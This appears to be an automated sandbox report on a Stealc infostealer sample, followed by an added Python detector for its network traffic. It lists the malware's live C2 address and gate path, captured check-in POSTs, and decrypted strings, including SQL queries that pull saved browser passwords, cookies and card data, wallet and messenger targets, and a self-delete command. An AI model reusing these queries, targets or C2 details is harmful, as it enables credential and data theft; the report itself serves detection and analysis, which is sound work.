
Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1546042
MD5: 3d17618b1108053c2643a92804657456
SHA1: 92d6f817db761936dbe341a58edcfbdb3f778de7
SHA256: 06485350aa2fecbc8b68c4bf5e2e507030065fd92794425da145c74b6804c41c
Tags: exe, user-Bitsight

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Sample uses string decryption to hide its real strings
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 5456 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 3D17618B1108053C2643A92804657456)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data-collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop cryptocurrency-wallet applications, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers: sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Blogpost URLs: (none listed)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}
Source | Rule | Description | Author
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security

Source | Rule | Description | Author
00000000.00000003.1261156514.0000000005290000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000002.1319415153.000000000163E000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
Process Memory Space: file.exe PID: 5456 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
Process Memory Space: file.exe PID: 5456 | JoeSecurity_Stealc | Yara detected Stealc | Joe Security

Source | Rule | Description | Author
0.2.file.exe.7b0000.0.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security

No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-31T12:18:21.407485+0100 | 2022930 | 1 | A Network Trojan was detected | 172.202.163.200 | 443 | 192.168.2.7 | 49744 | TCP
2024-10-31T12:18:59.653745+0100 | 2022930 | 1 | A Network Trojan was detected | 172.202.163.200 | 443 | 192.168.2.7 | 49952 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-31T12:18:08.346910+0100 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49702 | 185.215.113.206 | 80 | TCP
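The Suricata rows above record the C2 exchange with 185.215.113.206 on port 80, and the Signatures list flags HTTP requests sent without a User-Agent header. What follows is an added example for this page, not part of the Joe Sandbox report and not code from Joe Security or from the malware: a small detector that applies the same logic to HTTP proxy log lines. The known indicators (host and gate path) come from this report's extracted configuration. Treating a 16-hex-character ".php" gate name and a 16-hex-character directory such as "/746f34465cf17784/" as generic Stealc patterns, and treating that directory as the place the helper DLLs are fetched from, are assumptions generalised from this single sample, so those two checks are heuristics to tune against your own traffic. The log format, the second host 203.0.113.9 and the hostnames are constructed for the example.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Indicators taken directly from this report (configuration extractor and decrypted strings).
C2_HOST = "185.215.113.206"
C2_GATE = "/6c4adf523b719729.php"

# Assumptions, not facts from the report: the gate and the payload directory
# ("/746f34465cf17784/") use 16-hex-character names, so the two regexes below
# generalise from this one sample and are heuristics, not signatures.
GATE_RE = re.compile(r"^/[0-9a-f]{16}\.php$")
DLL_FETCH_RE = re.compile(r"^/[0-9a-f]{16}/[^/]+\.dll$")
BARE_IPV4_RE = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")


@dataclass
class HttpEvent:
    client: str
    method: str
    host: str          # Host header value with any ":port" removed
    path: str
    user_agent: Optional[str]


def parse_line(line: str) -> HttpEvent:
    """Parse one line of the constructed log format: client method host[:port] path "user-agent"."""
    m = re.match(r'^(\S+) (\S+) (\S+) (\S+) "([^"]*)"$', line)
    if not m:
        raise ValueError(f"unparseable log line: {line!r}")
    client, method, host, path, ua = m.groups()
    return HttpEvent(client, method, host.split(":")[0], path, None if ua == "-" else ua)


def classify(ev: HttpEvent) -> List[str]:
    """Return the reasons an event looks like Stealc C2 traffic (empty list = nothing seen)."""
    reasons = []
    if ev.host == C2_HOST:
        reasons.append("known-c2-host")
    if ev.path == C2_GATE:
        reasons.append("known-c2-gate")
    # The report's own signature: an HTTP request sent without a User-Agent header.
    if ev.method == "POST" and ev.user_agent is None:
        reasons.append("post-without-user-agent")
    bare_ip = bool(BARE_IPV4_RE.match(ev.host))
    if bare_ip and GATE_RE.match(ev.path):
        reasons.append("heuristic-16hex-php-gate-on-bare-ip")
    if bare_ip and DLL_FETCH_RE.match(ev.path):
        reasons.append("heuristic-dll-fetch-from-16hex-dir")
    return reasons


def severity(reasons: List[str]) -> str:
    """A known indicator, or two independent heuristics, rates high; one heuristic alone rates low."""
    if any(r.startswith("known-") for r in reasons) or len(reasons) >= 2:
        return "high"
    return "low" if reasons else "none"


def scan(lines: List[str]) -> List[Tuple[HttpEvent, List[str], str]]:
    hits = []
    for line in lines:
        ev = parse_line(line)
        reasons = classify(ev)
        if reasons:
            hits.append((ev, reasons, severity(reasons)))
    return hits


# Constructed sample log, modelled on the flow the report shows: the victim 192.168.2.7
# talks to the C2 on port 80. 203.0.113.9 and the hostnames are made up.
SAMPLE_LOG = [
    '192.168.2.7 POST 185.215.113.206:80 /6c4adf523b719729.php "-"',
    '192.168.2.7 GET 185.215.113.206:80 /746f34465cf17784/sqlite3.dll "-"',
    '192.168.2.7 GET www.example.com /index.html "Mozilla/5.0"',
    '192.168.2.7 POST 203.0.113.9 /a1b2c3d4e5f60718.php "-"',
    '192.168.2.7 POST api.example.net /submit "-"',
]

if __name__ == "__main__":
    for ev, reasons, sev in scan(SAMPLE_LOG):
        print(f"{sev:4} {ev.method} {ev.host}{ev.path} -> {', '.join(reasons)}")
```

Run stand-alone it prints four hits: the two requests to the known C2 host (high), the hypothetical second host that matches both heuristics (high), and a plain POST without a User-Agent to a named host (low). On real data replace parse_line with a parser for your proxy's format; the "known-" indicators expire with this campaign, while the User-Agent and bare-IP checks are the part worth keeping.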


                AV Detection

Source: file.exe | Avira: detected
Source: 0.2.file.exe.7b0000.0.unpack | Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}
Source: file.exe | ReversingLabs: Detection: 47%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: 0.2.file.exe.7b0000.0.unpack | String decryptor: recovered strings, one per line, in the order the report lists them:
  INSERT_KEY_HERE
  30
  11
  20
  24
  GetProcAddress
  LoadLibraryA
  lstrcatA
  OpenEventA
  CreateEventA
  CloseHandle
  Sleep
  GetUserDefaultLangID
  VirtualAllocExNuma
  VirtualFree
  GetSystemInfo
  VirtualAlloc
  HeapAlloc
  GetComputerNameA
  lstrcpyA
  GetProcessHeap
  GetCurrentProcess
  lstrlenA
  ExitProcess
  GlobalMemoryStatusEx
  GetSystemTime
  SystemTimeToFileTime
  advapi32.dll
  gdi32.dll
  user32.dll
  crypt32.dll
  ntdll.dll
  GetUserNameA
  CreateDCA
  GetDeviceCaps
  ReleaseDC
  CryptStringToBinaryA
  sscanf
  VMwareVMware
  HAL9TH
  JohnDoe
  DISPLAY
  %hu/%hu/%hu
  http://185.215.113.206
  bksvnsj
  /6c4adf523b719729.php
  /746f34465cf17784/
  tale
  GetEnvironmentVariableA
  GetFileAttributesA
  GlobalLock
  HeapFree
  GetFileSize
  GlobalSize
  CreateToolhelp32Snapshot
  IsWow64Process
  Process32Next
  GetLocalTime
  FreeLibrary
  GetTimeZoneInformation
  GetSystemPowerStatus
  GetVolumeInformationA
  GetWindowsDirectoryA
  Process32First
  GetLocaleInfoA
  GetUserDefaultLocaleName
  GetModuleFileNameA
  DeleteFileA
  FindNextFileA
  LocalFree
  FindClose
  SetEnvironmentVariableA
  LocalAlloc
  GetFileSizeEx
  ReadFile
  SetFilePointer
  WriteFile
  CreateFileA
  FindFirstFileA
  CopyFileA
  VirtualProtect
  GetLogicalProcessorInformationEx
  GetLastError
  lstrcpynA
  MultiByteToWideChar
  GlobalFree
  WideCharToMultiByte
  GlobalAlloc
  OpenProcess
  TerminateProcess
  GetCurrentProcessId
  gdiplus.dll
  ole32.dll
  bcrypt.dll
  wininet.dll
  shlwapi.dll
  shell32.dll
  psapi.dll
  rstrtmgr.dll
  CreateCompatibleBitmap
  SelectObject
  BitBlt
  DeleteObject
  CreateCompatibleDC
  GdipGetImageEncodersSize
  GdipGetImageEncoders
  GdipCreateBitmapFromHBITMAP
  GdiplusStartup
  GdiplusShutdown
  GdipSaveImageToStream
  GdipDisposeImage
  GdipFree
  GetHGlobalFromStream
  CreateStreamOnHGlobal
  CoUninitialize
  CoInitialize
  CoCreateInstance
  BCryptGenerateSymmetricKey
  BCryptCloseAlgorithmProvider
  BCryptDecrypt
  BCryptSetProperty
  BCryptDestroyKey
  BCryptOpenAlgorithmProvider
  GetWindowRect
  GetDesktopWindow
  GetDC
  CloseWindow
  wsprintfA
  EnumDisplayDevicesA
  GetKeyboardLayoutList
  CharToOemW
  wsprintfW
  RegQueryValueExA
  RegEnumKeyExA
  RegOpenKeyExA
  RegCloseKey
  RegEnumValueA
  CryptBinaryToStringA
  CryptUnprotectData
  SHGetFolderPathA
  ShellExecuteExA
  InternetOpenUrlA
  InternetConnectA
  InternetCloseHandle
  InternetOpenA
  HttpSendRequestA
  HttpOpenRequestA
  InternetReadFile
  InternetCrackUrlA
  StrCmpCA
  StrStrA
  StrCmpCW
  PathMatchSpecA
  GetModuleFileNameExA
  RmStartSession
  RmRegisterResources
  RmGetList
  RmEndSession
  sqlite3_open
  sqlite3_prepare_v2
  sqlite3_step
  sqlite3_column_text
  sqlite3_finalize
  sqlite3_close
  sqlite3_column_bytes
  sqlite3_column_blob
  encrypted_key
  PATH
  C:\ProgramData\nss3.dll
  NSS_Init
  NSS_Shutdown
  PK11_GetInternalKeySlot
  PK11_FreeSlot
  PK11_Authenticate
  PK11SDR_Decrypt
  C:\ProgramData\
  SELECT origin_url, username_value, password_value FROM logins
  browser:
  profile:
  url:
  login:
  password:
  Opera
  OperaGX
  Network
  cookies
  .txt
  SELECT HOST_KEY, is_httponly, path, is_secure, (expires_utc/1000000)-11644480800, name, encrypted_value from cookies
  TRUE
  FALSE
  autofill
  SELECT name, value FROM autofill
  history
  SELECT url FROM urls LIMIT 1000
  cc
  SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards
  name:
  month:
  year:
  card:
  Cookies
  Login Data
  Web Data
  History
  logins.json
  formSubmitURL
  usernameField
  encryptedUsername
  encryptedPassword
  guid
  SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
  SELECT fieldname, value FROM moz_formhistory
  SELECT url FROM moz_places LIMIT 1000
  cookies.sqlite
  formhistory.sqlite
  places.sqlite
  plugins
  Local Extension Settings
  Sync Extension Settings
  IndexedDB
  Opera Stable
  Opera GX Stable
  CURRENT
  chrome-extension_
  _0.indexeddb.leveldb
  Local State
  profiles.ini
  chrome
  opera
  firefox
  wallets
  %08lX%04lX%lu
  SOFTWARE\Microsoft\Windows NT\CurrentVersion
  ProductName
  x32
  x64
  %d/%d/%d %d:%d:%d
  HARDWARE\DESCRIPTION\System\CentralProcessor\0
  ProcessorNameString
  SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
  DisplayName
  DisplayVersion
  Network Info:
  - IP: IP?
  - Country: ISO?
  System Summary:
  - HWID:
  - OS:
  - Architecture:
  - UserName:
  - Computer Name:
  - Local Time:
  - UTC:
  - Language:
  - Keyboards:
  - Laptop:
  - Running Path:
  - CPU:
  - Threads:
  - Cores:
  - RAM:
  - Display Resolution:
  - GPU:
  User Agents:
  Installed Apps:
  All Users:
  Current User:
  Process List:
  system_info.txt
  freebl3.dll
  mozglue.dll
  msvcp140.dll
  nss3.dll
  softokn3.dll
  vcruntime140.dll
  \Temp\
  .exe
  runas
  open
  /c start
  %DESKTOP%
  %APPDATA%
  %LOCALAPPDATA%
  %USERPROFILE%
  %DOCUMENTS%
  %PROGRAMFILES%
  %PROGRAMFILES_86%
  %RECENT%
  *.lnk
  files
  \discord\
  \Local Storage\leveldb\CURRENT
  \Local Storage\leveldb
  \Telegram Desktop\
  key_datas
  D877F783D5D3EF8C*
  map*
  A7FDF864FBC10B77*
  A92DAA6EA6F891F2*
  F8806DD0C461824F*
  Telegram
  Tox
  *.tox
  *.ini
  Password
  Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
  Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
  Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
  Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
  Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
  oftware\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\
  00000001
  00000002
  00000003
  00000004
  \Outlook\accounts.txt
  Pidgin
  \.purple\
  accounts.xml
  dQw4w9WgXcQ
  token:
  Software\Valve\Steam
  SteamPath
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: \config\
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: ssfn*
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: config.vdf
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: DialogConfig.vdf
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: DialogConfigOverlay*.vdf
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: libraryfolders.vdf
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: loginusers.vdf
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: \Steam\
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: sqlite3.dll
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: browsers
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: done
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: soft
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: \Discord\tokens.txt
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: /c timeout /t 5 & del /f /q "
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: " & del "C:\ProgramData\*.dll"" & exit
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: C:\Windows\system32\cmd.exe
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: https
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: Content-Type: multipart/form-data; boundary=----
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: POST
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: HTTP/1.1
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: Content-Disposition: form-data; name="
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: hwid
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: build
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: token
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: file_name
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: file
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: message
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: screenshot.jpg
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007C9030 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_007C9030
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007BA210 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_007BA210
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007BA2B0 CryptUnprotectData,LocalAlloc,LocalFree,0_2_007BA2B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007B72A0 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_007B72A0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007BC920 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_007BC920
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: Binary string: my_library.pdbU source: file.exe, 00000000.00000003.1261156514.00000000052BB000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                Source: Binary string: my_library.pdb source: file.exe, file.exe, 00000000.00000003.1261156514.00000000052BB000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007C40F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_007C40F0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007BE530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_007BE530
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007B1710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_007B1710
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007C47C0 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_007C47C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007BF7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_007BF7B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007C4B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_007C4B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007C3B00 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_007C3B00
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007BDB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_007BDB80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007BBE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_007BBE40
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007BEE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_007BEE20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007BDF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_007BDF10

Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.7:49702 -> 185.215.113.206:80
Source: Malware configuration extractor | URLs: http://185.215.113.206/6c4adf523b719729.php
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | Host: 185.215.113.206 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1 | Content-Type: multipart/form-data; boundary=----EBAAAFBGDBKKEBGCFCBF | Host: 185.215.113.206 | Content-Length: 211 | Connection: Keep-Alive | Cache-Control: no-cache | Data Raw: 2d 2d 2d 2d 2d 2d 45 42 41 41 41 46 42 47 44 42 4b 4b 45 42 47 43 46 43 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 39 38 36 35 35 44 37 31 46 45 43 32 32 37 33 38 34 38 33 30 38 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 41 41 46 42 47 44 42 4b 4b 45 42 47 43 46 43 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 41 41 46 42 47 44 42 4b 4b 45 42 47 43 46 43 42 46 2d 2d 0d 0a | Data Ascii: ------EBAAAFBGDBKKEBGCFCBFContent-Disposition: form-data; name="hwid"698655D71FEC2273848308------EBAAAFBGDBKKEBGCFCBFContent-Disposition: form-data; name="build"tale------EBAAAFBGDBKKEBGCFCBF--
Source: Joe Sandbox View | IP Address: 185.215.113.206
Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL
Source: Network traffic | Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.7:49744
Source: Network traffic | Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.7:49952
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007B62D0 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | Host: 185.215.113.206 | Connection: Keep-Alive | Cache-Control: no-cache
Source: unknown | HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1 | Content-Type: multipart/form-data; boundary=----EBAAAFBGDBKKEBGCFCBF | Host: 185.215.113.206 | Content-Length: 211 | Connection: Keep-Alive | Cache-Control: no-cache | Data Raw: 2d 2d 2d 2d 2d 2d 45 42 41 41 41 46 42 47 44 42 4b 4b 45 42 47 43 46 43 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 39 38 36 35 35 44 37 31 46 45 43 32 32 37 33 38 34 38 33 30 38 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 41 41 46 42 47 44 42 4b 4b 45 42 47 43 46 43 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 41 41 46 42 47 44 42 4b 4b 45 42 47 43 46 43 42 46 2d 2d 0d 0a | Data Ascii: ------EBAAAFBGDBKKEBGCFCBFContent-Disposition: form-data; name="hwid"698655D71FEC2273848308------EBAAAFBGDBKKEBGCFCBFContent-Disposition: form-data; name="build"tale------EBAAAFBGDBKKEBGCFCBF--
Source: file.exe, 00000000.00000002.1319415153.000000000163E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206
Source: file.exe, 00000000.00000002.1319415153.0000000001699000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1319415153.00000000016A6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/
Source: file.exe, 00000000.00000002.1319415153.00000000016A6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/.IE5
Source: file.exe, 00000000.00000002.1319415153.0000000001699000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/2O
Source: file.exe, 00000000.00000002.1319415153.0000000001699000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1319415153.00000000016A6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1319415153.00000000016BD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1319415153.0000000001682000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php
Source: file.exe, 00000000.00000002.1319415153.0000000001682000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php#
Source: file.exe, 00000000.00000002.1319415153.00000000016A6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php=YV
Source: file.exe, 00000000.00000002.1319415153.00000000016BD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php?
Source: file.exe, 00000000.00000002.1319415153.000000000163E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpZ
Source: file.exe, 00000000.00000002.1319415153.0000000001699000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/aO
Source: file.exe, 00000000.00000002.1319415153.0000000001699000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/ws
Source: file.exe, file.exe, 00000000.00000003.1261156514.00000000052BB000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support

System Summary

Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BFE0A5
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00ACC03C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C03063
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007F0098
